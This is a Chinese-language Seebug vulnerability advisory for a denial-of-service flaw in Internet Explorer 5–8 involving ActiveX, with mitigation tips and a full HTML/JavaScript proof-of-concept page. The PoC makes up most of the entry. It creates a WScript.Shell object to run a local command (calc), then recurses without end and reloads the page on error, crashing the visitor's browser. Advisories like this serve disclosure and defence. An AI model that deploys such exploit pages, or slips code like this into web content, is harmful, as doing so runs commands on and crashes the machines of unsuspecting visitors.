Internet Explorer 无限循环拒绝服务漏洞

2010-03-18T00:00:00
ID SSV:19286
Type seebug
Reporter Root
Modified 2010-03-18T00:00:00

Description

该漏洞存在于ActiveX控件中. 攻击者可以构造恶意页面诱使用户访问,恶意代码可运行任何Windows命令,消耗大量内存,导致访问者IE浏览器崩溃。

Internet Explorer 5 Internet Explorer 6 Internet Explorer 7 Internet Explorer 8 禁止ActiveX控件自动运行。 不要手工运行该类控件运行。

                                        
                                            
                                                <html>
<title>Liscker@hotmail.com</title>
<head>
<script type="text/javascript">
function sucks()
{
var shell=new ActiveXObject("wscript.shell");
shell.Run("calc", 1);
}
function asheesh()
{
sucks();
window.onerror=new Function("history.go(0)");
window.print();
asheesh();
}
asheesh();
</script>
</head>
<body onLoad="asheesh()"></body>
</html>